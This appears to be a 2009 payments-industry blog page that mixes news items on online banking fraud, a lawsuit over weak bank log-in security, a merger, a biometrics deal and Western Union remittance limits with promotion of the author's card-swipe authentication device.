Tuesday, September 8, 2009

Smart Card Alliance Executive Direct Unhappy with Online Banking Security

In today's Smart Card Newsletter, issued by the Smart Card Alliance,  Randy Vanderhoof, Executive Director of the Smart Card Alliance, had the following to say about online banking fraud:  

Payment fraud resulting from massive data breaches was in the news again this month and one specific type of payment fraud–online banking fraud–got a little too close to home for me personally...

The Smart Card Alliance fell victim to such fraud this month. Our online banking account was breached by someone who created a valid account relationship with the Alliance’s business checking account and began making large, unauthorized ACH withdrawals from our account.

What was most shocking was how inept the bank’s (I won’t mention any names, but it is one of the BIG ones) internal business processes were in responding to the fraud, locking down the account, and putting on additional controls after the fraud was reported. What I was told was that I could set up manual controls to limit ACH deposits and withdrawals to only authorized accounts, but that I needed to upgrade our account to a “stronger” type of account.  It took 10 business days just to have an ACH blocking feature turned on!

I was also told that the bank can provide me with a smart card–not to securely log in and authenticate myself to my account in place of my current user name and password , but rather to have the chip generate a dynamic one-time password (OTP) each time I authorize a transaction.

For authentication,
I would still have to type the password into my desktop computer , which just might be infected with a key logger connected to Twitter-like instant messaging that can capture my account information "and the OTP" as I type and log in as me without me even knowing it. (Such a “man-in-the-middle” attack was recently revealed in this NY Times article).

I am on a mission now: to find out how our bank account got hacked, why all online personal and business checking accounts are vulnerable–at least in this bank–and why no one is doing anything about it.

An Open Letter to Mr. Vanderhoof:   Randy,  HomeATM agrees that typing your password into your desktop computer is a futile way to prevent hackers from obtaining your sensitive data and HomeATM IS  trying to do something about it.  We are in the midst of speaking with several national banks in order to demonstrate that consumers need to authenticate themselves the same way they do at an ATM machine.  I am aware, that as Executive Director of the Smart Card Alliance you would probably be more interested in our EMV version (which we have, should you know anyone in Europe who might be interested) , but until EMV is prevalent in the United States, we are offering banks the opportunity to offer their customers our PCI 2.x Certified PIN Entry Device, the only one of its kind.  One which would provide users with the security and protection of a two-factor (what you have/card and what you know/PIN) 3DES DUKPT TRUE "End to End Encrypted" Log-In.   (Most are End-to-Almost-End Encrypted)  HomeATM provides true Zone 1 through Zone 5 encryption for the PIN.  (The track2 data is encrypted through Zones 1-4)

Our device would also provide consumers with the means to conduct "card present" transactions in a "card not present" fraud infested world (wide web) and enable the bank to offer a real time (not ACH) P2P Money Transfer option as well as " real time" online bill payments.  

Maybe the Citizen's Bank lawsuit, which I blogged about earlier today will open their eyes to the risk they are not only exposing their customers to, but the risks they are exposing themselves to as well!   F
eel free to drop me a line anytime if you'd like to discuss further!   

John B. Frank

Reblog this post [with Zemanta]

Online Fraud Shows No Signs of Letting Up

Card Not Present Fraud is the biggest culprit. 

HomeATM provides a low cost, 2FA 3DES E2EE PCI 2.x Certified Solution which allows Internet Retailers and Consumers to level the playing field by eliminating the "card not present" environment. 

If an online consumer was instructed to  "Swipe their Card thereby capturing the data on the magnetic stripe, it would be, by definition, a "card present" transaction. 

Therefore, our device would eliminate "card not present" fraud by "morphing" the "card not present" environment into a "card present" environment.  Yes? 

You might say that HomeATM changes the way card information is swiped. 

The way it is done now, the card details are "swiped by the fraudsters."   Does it not make more sense for the online shopper to "swipe" their own card details? Then again, we could ignore all the red flags and just keep on typing!

No let up by fraudsters as online card spend soars | Response Source

Fraud prevention specialists reveal Britain’s top UK card fraud hotspots

Many of Britain’s high street shops may have been affected by the economic downturn, but millions of consumers have been more than happy to spend their money online and through mail order with their favorite retailers. However, once again the dark side of card usage is revealed as fraud specialists, the 3rd Man, unveil the extent of criminal card activity and in particular the worst places in Britain for attempted card fraud.
An analysis of the 3rd Man’s comprehensive and detailed records shows that between August 2008 and August 2009, shoppers spent an estimated £46 billion using their cards in ‘card not present’ transactions, the term used to describe purchasing when, for example, a customer is buying online or by phone. Of this figure, fraudsters have tried their best to relieve retailers of more than half a billion pounds worth of goods.

“Although Britain has been in a serious recession, it appears that many consumers have been happy to spend their money over the Internet, which is good news,” says Andrew Goodwill, fraud specialist with the 3rd Man.

“However, fraudsters show no signs of giving up. They know that online shopping has become big business and they try every scam imaginable to dupe retailers. More and more honest people are using their cards to buy over the Internet, but unfortunately more and more fraudsters are also upping their game.” 

Editor's Note:  Time to "up OUR game" or these "jokers" will continue to steal our identities, cash, and peace of mind.  Eliminate Typing, Start Swiping and "Card Not Present" fraud will be eliminated. It's really not that difficult to grasp the concept...is it?  

Reblog this post [with Zemanta]

Metavante Shareholders Approve FIS Merger

On Friday, I posted a press release announcinig that the Department of Justice cleared the way for an FIS/Metavante merger: See: FIS and Metavante Receive DoJ Clearance to Proceed with Merger

Last July, I posted that Fidelity National Information Services was holding a special shareholder meeting See: Fidelity and Metavante to Hold Special Shareholder Meetings   to vote on the merger.  Apparently, Metavante was waiting on the DoJ clearance to hold and announce the results of their shareholders votes:  RTTNews reports the vote was overwhelmingly "for"...

(RTTNews) - Banking and payment solutions provider Metavante Technologies, Inc., said Friday that its shareholders overwhelmingly approved the proposed merger with Fidelity National Information Services, Inc., FIS at a special shareholder meeting.

Earlier on April 1, Fidelity, also a banking and payment technologies provider. had agreed to acquire rival Metavante in an all stock deal valued at about $2.95 billion. The deal had the approval of the board of both the companies. The Milwaukee, Wisconsin - based company and FIS are targeting an October 1, 2009, completion date for the merger, subject to customary closing conditions. The transaction is expected to be accretive to adjusted earnings per share in fiscal 2010.

The combination is expected to create a company with a pro forma enterprise value of $10 billion and the world's largest provider of comprehensive integrated payment and financial core processing services. The deal is expected to achieve cost synergies of about $260 million and increased long-term organic revenue growth for Fidelity.

Metavante Technologies, spun-off from Marshall & Ilsley Corp. (MI) in November 2007, has been offering processing services to about 8,000 financial institutions of all sizes for more than 40 years. Services include outsourced deposit, loan, and trust account processing, check processing, electronic funds transfer, commercial treasury services, and health care payment services.


Jul 27, 2009
FIS will hold a special meeting of its shareholders to vote on the issuance of FIS common stock in connection with the merger of Metavante into a wholly owned subsidiary of FIS, and to vote on the issuance of approximately 16 million ...

Friday, September 4, 2009

FIS and Metavante Receive DoJ Clearance to Proceed with Merger

Fidelity National Information Services, Inc. and Metavante Technologies, Inc., Receive Department of Justice Clearance to Proceed with Planned Merger

Reblog this post [with Zemanta]

Biometrics Firm Partners with InterSwitch in Nigeria

LUND, Sweden - (September 8, 2009 PIN Payments Blog) Precise Biometrics has entered into a strategic partnership with Interswitch -- one of the leading African financial solution providers based in Nigeria. The aim is to supply fingerprint recognition with Precise Match-on-Card(TM) to bank applications. The partnership is already engaged in a first project, which will provide license sales at a minimum of EUR200,000 in 2009.

The partnership between Precise Biometrics and Interswitch aims at building and promoting biometric Match-on-Card solutions for the bank segment in Africa. The solutions will initially target Nigeria, which is the largest populated country on the continent with more than 150 million inhabitants.

Nigeria recently decided to replace magstripe bank cards with more secure chip cards, so called smart cards, in order to gradually eliminate fraud related to less secure magstripe cards. The new cards comply with the EMV (Europay, Mastercard, VISA) standard used in the bank industry and the government deadline to replace all magstripe cards with chip-based smart cards is December 31, 2009.

To enable banks to migrate faster, Interswitch has introduced the Verve card into the market. The Verve card has both international and local security features, and through Interswitch's partnership with Precise Biometrics, it also includes fingerprint recognition and Match-on-Card features. These features are used to control a cardholder's physical presence at the moment of a transaction. With fingerprint recognition and Match-on-Card, banks, governments and organizations increase security internally as well as for customers through personal verification and KYE (Know Your Employee).

Mitchell Elegbe, Managing Director and Chief Executive Officer of Interswitch states: "We are pleased to enter into this partnership, as Precise Biometrics is the leading provider of biometric Match-on-Card solutions. We believe that our joint efforts and technological know-how will have great commercial potential in the West African region. The capabilities, security and reliability of the Match-on-Card solution gives us a positive differentiation from biometric solutions that are relying on databases or external servers."

Thomas Marschall, CEO at Precise Biometrics comments: "We are very pleased to have come to an agreement with Interswitch, which will place Precise Biometrics in a prime position to capture the rising biometric opportunities within the financial sector of West Africa. While the strength of the partnership is documented by already being engaged in a project which will provide income for 2009, we have substantial commercial expectations for the partnership in 2010 and onwards."

Precise Biometrics is a market-leading provider of solutions for fingerprint recognition to prove people's identities. With top-of-the-line expertise in fingerprint verification, Precise Biometrics offers fast, accurate and secure authentication of a person.

Its core product, Precise Match-on-Card(TM), adds value to ID, SIM, enterprise and bank cards as well as systems for access control to buildings, computers and networks. Precise Biometrics serves business and government organizations throughout the world and its technology is licensed to close to 100 million users.

For more information, please visit www.precisebiometrics.com or see a presentation


For the full version of the press release please click on the link below http://hugin.info/131387/R/1337790/318917.pdf

For more information, contact:

Precise Biometrics AB

Thomas Marschall, CEO

+46 46 31 11 10

+46 734 35 11 10

Email: thomas.marschall@precisebiometrics.com

Don't Say I Didn't Warn You on Dangers of Online Banking!

I've been blogging about the dangers of online banking for quite a while now.  So as more an more people fall victim to phishing attacks, keylogging, DNS Hijacking, SQL Injections, Cloned Bank Websites, etc. you can't say I didn't warn you...

Today I found a "mainstream" article (The Telegraph UK) that sums up my beliefs...specifically..."Don't Type...Swipe!  

Here are some excerpts:

Viruses, spyware, key loggers – the James Bond style vocabulary of the computer hacker is enough to make us paranoid about losing all the money in our bank accounts when we log on to online banking to pay the gas bill.

And it's not just an irrational fear. Take one acquaintance of mine. She's hardly computer illiterate – a web designer with programming skills, she keeps her antivirus and other security software up to date religiously. Yet this didn't stop someone hacking into her account and sending himself most of the money she had at the time. A quick look at the online forums confirms that she's by no means the only one to fall for this particular scam.

So is online banking secure? I've spoken to a couple of experts in computer security. Both were happy to bank online themselves, they told me, although they take rigorous precautions to keep the hackers out. But they're experts: what about the rest of us? We don't want to spend our lives keeping up with the latest online threats.

After all, the criminals have economies of scale on their side – they can put a lot of effort into perfecting their malicious software because, once it's ready, they can use the internet to get it onto the PCs of hundreds of thousands of people. So there's a huge underworld industry out there, all busily working out new ways to bypass our firewalls and get at our passwords.

My experts told me that the man in the street can bank safely online, but only if certain conditions are met.
Firstly, if your bank has given you a card reader – a gadget you connect to your computer and insert your bank card into – you are safe.

If you don't have a card reader, look at how you enter your password.

Do you just type it in?
That's a gift to the scammers – a simple piece of spyware software called a key logger can record the password and send it off to the fraudsters over the internet.

Fortunately, the banks are getting wise to this. Many have developed websites that make you enter your details using mouse clicks. Although in principle it's possible to write malicious software that tracks this too, it's a lot more work than a simple key logger. Editor's Note:  A little more work won't stop them, besides, as more banks go to this method, more hackers will dedicate their time to developing a mouse click logging program...especially when people start mouse clicking their PINs, as PINs are the "holy grail" for hackers.

If you don't have a card reader and you use the keyboard to enter your whole password, you are depending entirely on your security software – and the hackers only have to be lucky once.

Personally, after seeing what happened to my friend the web designer, I wouldn't take this risk. She got her money back in the end, but only after days of worry and frantic phone calls. And the banks are becoming more and more reluctant to bail out those who have failed to take online security seriously.

When it comes to internet banking, a little paranoia is no bad thing.

Reblog this post [with Zemanta]

Online Banking Fraud Doubled in 2008

How safe is your internet banking? | Dan Hyde, This is Money

Banks love to promote their internet banking's security, but just how safe is it? Find out why Halifax and Abbey customers are most at risk

How safe is your internet banking? Online banking fraud nearly doubled in 2008.

A worrying £52.5m was stolen by sinister hackers tracking the movements of their prey, affecting one in four of all those banking online.  Some customers are still falling foul of 'phishing' schemes – emails that pretend to be from a bank and then direct customers to bogus websites where their passwords are stolen.  But more careful online bank customers are also suffering at the hands of underground hacking technology.

'Keylogging' – whereby a virus tracks every stroke of a password as it is entered – can breach the best of defences on personal computers, and is largely held responsible for the rise in online fraud.
For the ordinary web user, extra-thick internet firewalls and up-to-date anti-virus software is about as much as can be done to fend off this aggressive software.  But improving technology has helped the hackers past these barriers and, to make matters worse, many users still forget or disregard important steps like regular computer checks.

That means the onus falls on the banks to protect their vulnerable customers from internet keylogging rogues – and some are better at it than others.  Expert-led research at Which? Computing magazine showed that Halifax and Abbey internet customers are exposed to the greatest risk of having money stolen from their accounts, while Barclays led the way with its anti-fraud password controls.

Security loopholes - including password entry methods that are dangerously exposed to keyloggers, and unprotected money transfers once a user is logged in - had Abbey and Halifax firmly at bottom of the online security pile.

Barclays, meanwhile, excelled by using both its PINsentry device to generate a random password every time a user logs on, and by asking for more login information than other banks.

Some banks have also begun to use apparatus such as drop-down menus, making keylogging impossible, but this has not yet found its way onto either Abbey or Halifax's sites.

Of course, the flipside is that the once ultra-convenient days of internet banking with just a password are gone for many, replaced by carrying a card machine with keypad round and having to fill in a run of details for each transaction.

Reblog this post [with Zemanta]

Court Allows Suit Against Bank Based on Poor Online Banking Log-In

I was working on a post I decided to entitle "Don't Say I Didn't Warn You" (upcoming) when this came across the wires.  The PIN Payments Blog will follow this case closely as the ruling will set a precedent, as all rulings do.  This could be a game-changing ruling when it comes to how banks provide authentication.  As I've stated for the past 18 months, Don't Type...Swipe!  This case could result in banks being subjected to the risk, as opposed to their customers which might provide more motivation for them to take the extra steps necessary to securely authenticate their online banking customers with a 2FA 3DES DUKPT E2EE PCI 2.x Certified approach.  

This was first reported by David Johnson's Digital Media Lawyer Blog which spoke a little about the the largest precedential impact. 

"The aspect of the case that may have the largest precedential impact was its decision on the plaintiffs' negligence cause of action. (Fn1) A major basis for their negligence claim was the theory that financial institutions have a common law duty to protect their members' or customers' confidential information against identity theft. While the Court could not find controlling State precedent on point (Indiana law applied), it noted that Indiana courts have held that a bank has a duty not to disclose information concerning one of its customers unless it is to someone who has a legitimate public interest. The Court then stated, "If this duty not to disclose customer information is to have any weight in the age of online banking, then banks must certainly employ sufficient security measures to protect their customers' online accounts."
Editor's Note:  If Citizens loses this case..."citizens everywhere win".... as banks will be forced to increase the security of online banking.  There is no safer way to authenticate the user than to utilize the same trusted security banks use to dispense cash at ATM's.  HomeATM provides the only 2FA 3DES DUKPT E2EE PCI 2.x Certified Solution  in two hemispheres.  The average phishing attack is $352 and that hasn't yet got the banks moving.  Maybe the threat of losing $100k+ every time one of their online customers fall victim to fraud caused by weak authentication will motivate them to invest $12.00 or so, and protect themselves AND their customers.   We'll keep ya posted!

Finextra: Court allows suit against bank for poor online security

The plaintiffs claim that by only requiring user names and passwords to authenticate customers at log in, Citizens failed to maintain state-of-the-art security standards.  

A US couple who had thousands of dollars stolen from their online account have been given the go-ahead by a court to sue their bank for failing to provide adequate security.

In 2007 Marsha and Michael Shames-Yeakel fell victim to an ID thief who gained access to their Citizens Financial Bank online account and stole $26,500 from a home equity credit line.  The money was transferred, via a bank in Hawaii, to a financial institution in Austria. The Austrian bank refused to return the funds, prompting Citizens to inform the couple that they would be liable for the loss.

The Shames-Yeakel's refused to pay, leading the bank to report their account as delinquent to the national credit bureaus and threaten to foreclose on their residence. In response, the couple sued the bank on several grounds, claiming violations of the Electronic Funds Transfer Act and the Fair Credit Reporting Act, in the northern district of Illinois.   They also accused the bank of negligence under state law for failing to adequately protect their online accounts.

"In light of Citizens' apparent delay in complying with FFIEC security standards, a reasonable finder of fact could conclude that the bank breached its duty to protect Plaintiffs' account against fraudulent access." - US District Judge Rebecca Pallmeyer

The Judge also states: "If this duty not to disclose customer information is to have any weight in the age of online banking, then banks must certainly employ sufficient security measures to protect their customers' online accounts."

Reblog this post [with Zemanta]

Does Western Union Limitation Apply to B2B Payments?

Western Union to compete in the international B2B payments space
Commerical Payments International is reporting that Western Union is getting ready to compete in the B2B payments space.  I'm wondering out loud if the same P2P limitations outlined in the previous post, applies to B2B transfer? 

Western Union to compete in the international B2B payments space

With its acquisition of international B2B (business-to-business) payments provider Custom House, Western Union has placed itself firmly as a competitor in the international B2B payments space. Custom House processes payments originating in seven countries for payout in 120 countries.

This acquisition introduces Western Union to a new market – cross-border payments for small- to medium-sized enterprises (SMEs). The SME segment has become an increasingly important focus for payments providers in recent times as they develop products designed to serve the needs of this previously underserved market.

Western Union estimates that the SME cross-border payments market generates global revenue at least as great as the consumer-to-consumer money transfer market.

Currently, Custom House enables more than 40,000 clients to make payments in over 150 currencies. Its clients range from businesses with a need to pay international staff to firms that want to pay vendors and merchants.

, , ,

Western Union Limitation Causing Big Problems

US Meltdown Crippling Western Union Money Transfers

7News in Belize is reporting on a little known Western Union limitation.  Namely, what goes out, had to have come in the day before.  This is causing a big problem for people wanting to send money transfers.  In fact, reports say if you don't get there and put in your send request by 8:15 AM, you are out of luck for that particular day....

Have you tried to send money via Western Union recently
? If you have, then you’ll know that unless you start lining up, like an hour before the office opens,
it’s almost impossible to send money  But why is this? Is it an oppressive monetary policy, low reserves or could it be what the growth economist like to call, “exogenous shocks?” Well, according to the Governor of the Central Bank Glenford Ysaguirre it’s the third: outside factors.

You see, in any one day, Western Union can only send out as much money as it got the day before – and since the US financial meltdown, remittances, meaning money sent from the states, has declined sharply. So, in any one day, all the Western Union agencies across the country only receive something in the range of one hundred thousand US dollars. So that becomes the quota for the following day, meaning the limit of what they can wire out. Spread that $100,000 across 37 agencies countrywide, and it’s not much, meaning that if you get to a Western Union office by 8:15, you’re probably already too late!

It’s a big change; in the past no one had ever heard of a cap on the amount of money that can be sent out; you could visit the office anytime during regular working hours and breezily send the money. But things have changed and it’s been the roughest on those depend on the service for its convenience and speed. But the Governor of the Central Bank told Jacqueline Godwin today that there’s nothing the bank can do.

Glenford Ysaguirre, Governor - Central Bank of Belize

“There is some misinformation out there that the Central Bank has something to do with it because we are restricting Western Union. But no, those are conditions on their licenses from the time the license were issued. So it is not some new condition that has gone into place; it has always been there. It is just that in the past the remittances were sufficient to cover the outgoing demand.  A condition of their license is that they can only sell foreign exchange to the extent that they receive. So their outgoing remittances cannot be more than their incoming. That is to protect and preserve the reserve position of the country.

Jacqueline Godwin, “So for example if they receive twenty thousand dollars for that day, they cannot give out more than twenty thousand dollars?

Glenford Ysaguirre, “Yes that is the condition. So I guess with the economic downturn remittances coming from the States actually is on a decline and so they are restricted or limited by that and have to adjusts the outgoing remittances to the same magnitude.

The Central Bank is not here to source US dollars for Western Union remittances. The commercial banks source their own US dollars and they source that through investments coming in from customers or from proceeds from export earnings that goes into the commercial banks and that is also available to the public through the commercial banks. So if Western Union do not have, people have the option of going to a commercial bank and purchasing US dollars based on availability.”  Anecdotal reports are that things have gotten so bad in the states that in some cases Belizean are subsidizing their Belizean American relatives. Ysaguirre says that retired Belizeans living in the States are also drawing down on their savings in Belize. In the meantime, he’d urge those frustrated with the Western Union cash flow constriction to try using the banks since they have greater sources of foreign exchange.

Reblog this post [with Zemanta]

Web Browsers Exploited by XSS Attacks

Tech Insight: XSS Exposed

Pervasive Web application vulnerability is often misunderstood -- with dangerous consequences
By John Sawyer DarkReading - A Special Analysis for Dark Reading

SQL injection has been getting most of the attention lately, but the average SQL injection attack isn't nearly as sophisticated and difficult to pull off as a well-crafted cross-site scripting (XSS) attack:

XSS affects all victims of a vulnerable Website, stealing their credentials, exploiting their Web browsers, and taking action on behalf of them without their knowledge.

XSS has been the reigning champion of Web application vulnerabilities in the sheer number of applications that house this vulnerability. Like SQL injection, XSS is a flaw caused by a lack of validation of user input. But instead of attacking the Web application or database server directly, the XSS attack hits the Web app's victims and executes malicious code in the victims' Web browsers.

Continue Dark Reading

Reblog this post [with Zemanta]

Disqus for ePayment News